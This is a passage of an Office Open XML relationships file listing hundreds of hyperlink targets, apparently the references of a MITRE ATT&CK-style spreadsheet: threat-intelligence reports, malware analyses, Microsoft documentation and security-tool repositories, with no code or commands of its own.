Target="https://forum.sysinternals.com/appcertdlls_topic12546.html" TargetMode="External"/><Relationship Id="rId2671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/craiu/status/1311920398259367942" TargetMode="External"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/blog/20180802Raspite.html" TargetMode="External"/><Relationship Id="rId1066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata" TargetMode="External"/><Relationship Id="rId1273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" TargetMode="External"/><Relationship Id="rId1480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/" TargetMode="External"/><Relationship Id="rId2117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf" TargetMode="External"/><Relationship Id="rId2324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/" TargetMode="External"/><Relationship Id="rId2769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/" TargetMode="External"/><Relationship Id="rId2976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc" TargetMode="External"/><Relationship Id="rId850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20151226205946/https:/www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" TargetMode="External"/><Relationship Id="rId948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html" TargetMode="External"/><Relationship Id="rId1133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/" TargetMode="External"/><Relationship Id="rId1578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)" TargetMode="External"/><Relationship Id="rId1785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx" TargetMode="External"/><Relationship Id="rId1992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" TargetMode="External"/><Relationship Id="rId2531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx" TargetMode="External"/><Relationship Id="rId2629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n" TargetMode="External"/><Relationship Id="rId2836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/kaloprominat/6111584" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" TargetMode="External"/><Relationship Id="rId710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" TargetMode="External"/><Relationship Id="rId808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" TargetMode="External"/><Relationship Id="rId1340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/Bash" TargetMode="External"/><Relationship Id="rId1438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" TargetMode="External"/><Relationship Id="rId1645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/windows/desktop/ms524405" TargetMode="External"/><Relationship Id="rId1200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" TargetMode="External"/><Relationship Id="rId1852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.mythic-c2.net/" TargetMode="External"/><Relationship Id="rId2903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/" TargetMode="External"/><Relationship Id="rId1505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/" TargetMode="External"/><Relationship Id="rId1712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference" TargetMode="External"/><Relationship Id="rId2181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sec.gov/edgar/search-and-access" TargetMode="External"/><Relationship Id="rId3025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ARMmbed/mbed-crypto" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js" TargetMode="External"/><Relationship Id="rId2041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.prevailion.com/darkwatchman-new-fileless-techniques/" TargetMode="External"/><Relationship Id="rId2279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure" TargetMode="External"/><Relationship Id="rId2486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html" TargetMode="External"/><Relationship Id="rId2693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/945681177108762624" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" TargetMode="External"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine" TargetMode="External"/><Relationship Id="rId872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html" TargetMode="External"/><Relationship Id="rId1088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/" TargetMode="External"/><Relationship Id="rId1295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Installutil/" TargetMode="External"/><Relationship Id="rId2139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId2346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/" TargetMode="External"/><Relationship Id="rId2553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490996.aspx" TargetMode="External"/><Relationship Id="rId2760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ironnetinjector/" TargetMode="External"/><Relationship Id="rId2998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/" TargetMode="External"/><Relationship Id="rId732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/" TargetMode="External"/><Relationship Id="rId1155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM" TargetMode="External"/><Relationship Id="rId1362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MITRECND/malchive/blob/main/malchive/utilities/findapihash.py" TargetMode="External"/><Relationship Id="rId2206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3" TargetMode="External"/><Relationship Id="rId2413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" TargetMode="External"/><Relationship Id="rId2620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://success.trendmicro.com/solution/000283381" TargetMode="External"/><Relationship Id="rId2858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Active_Directory" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/" TargetMode="External"/><Relationship Id="rId1015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ryhanson/phishery" TargetMode="External"/><Relationship Id="rId1222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging" TargetMode="External"/><Relationship Id="rId1667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285" TargetMode="External"/><Relationship Id="rId1874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/glossary/term/authentication" TargetMode="External"/><Relationship Id="rId2718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA18-201A" TargetMode="External"/><Relationship Id="rId2925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" TargetMode="External"/><Relationship Id="rId1527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/kb/249873" TargetMode="External"/><Relationship Id="rId1941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf" TargetMode="External"/><Relationship Id="rId3047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bontchev/pcodedmp" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" TargetMode="External"/><Relationship Id="rId1801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.ca/2016/11/parliament-keyboy/" TargetMode="External"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine" TargetMode="External"/><Relationship Id="rId2063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader" TargetMode="External"/><Relationship Id="rId2270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish" TargetMode="External"/><Relationship Id="rId2368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/" TargetMode="External"/><Relationship Id="rId894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" TargetMode="External"/><Relationship Id="rId1177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.issuemakerslab.com/research3/" TargetMode="External"/><Relationship Id="rId2130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/verclsid-exe-threat-detection/" TargetMode="External"/><Relationship Id="rId2575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" TargetMode="External"/><Relationship Id="rId2782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom" TargetMode="External"/><Relationship Id="rId754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" TargetMode="External"/><Relationship Id="rId961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/" TargetMode="External"/><Relationship Id="rId1384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" TargetMode="External"/><Relationship Id="rId1591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx" TargetMode="External"/><Relationship Id="rId1689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" TargetMode="External"/><Relationship Id="rId2228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" TargetMode="External"/><Relationship Id="rId2435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/articles/ssh-and-ssh-agent" TargetMode="External"/><Relationship Id="rId2642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=lDvf4ScWbcQ" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/reflections-on-reflections/" TargetMode="External"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/" TargetMode="External"/><Relationship Id="rId821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" TargetMode="External"/><Relationship Id="rId1037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/filesystem/upload.go" TargetMode="External"/><Relationship Id="rId1244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" TargetMode="External"/><Relationship Id="rId1451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" TargetMode="External"/><Relationship Id="rId1896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/" TargetMode="External"/><Relationship Id="rId2502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html" TargetMode="External"/><Relationship Id="rId2947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html" TargetMode="External"/><Relationship Id="rId919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html" TargetMode="External"/><Relationship Id="rId1104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackers-arise.com/email-scraping-and-maltego" TargetMode="External"/><Relationship Id="rId1311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" TargetMode="External"/><Relationship Id="rId1549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx" TargetMode="External"/><Relationship Id="rId1756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events" TargetMode="External"/><Relationship Id="rId1963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/" TargetMode="External"/><Relationship Id="rId2807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html" TargetMode="External"/><Relationship Id="rId1409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/" TargetMode="External"/><Relationship Id="rId1616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script" TargetMode="External"/><Relationship Id="rId3069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" TargetMode="External"/><Relationship Id="rId2085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stascorp/rdpwrap" TargetMode="External"/><Relationship Id="rId2292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" TargetMode="External"/><Relationship Id="rId2152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" TargetMode="External"/><Relationship Id="rId2597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack" TargetMode="External"/><Relationship Id="rId776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/google-hacking-database" TargetMode="External"/><Relationship Id="rId983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheWover/CertStealer" TargetMode="External"/><Relationship Id="rId1199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/redsnarf" TargetMode="External"/><Relationship Id="rId2457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments" TargetMode="External"/><Relationship Id="rId2664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/container-registry/container-registry-content-trust" TargetMode="External"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/threat/dymalloy/" TargetMode="External"/><Relationship Id="rId1059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique" TargetMode="External"/><Relationship Id="rId1266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf" TargetMode="External"/><Relationship Id="rId1473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" TargetMode="External"/><Relationship Id="rId2012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wunderwuzzi23.github.io/blog/passthecookie.html" TargetMode="External"/><Relationship Id="rId2317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/" TargetMode="External"/><Relationship Id="rId2871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution" TargetMode="External"/><Relationship Id="rId2969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/" TargetMode="External"/><Relationship Id="rId843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html" TargetMode="External"/><Relationship Id="rId1126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection" TargetMode="External"/><Relationship Id="rId1680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019" TargetMode="External"/><Relationship Id="rId1778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx" TargetMode="External"/><Relationship Id="rId1985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" TargetMode="External"/><Relationship Id="rId2524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc771049.aspx" 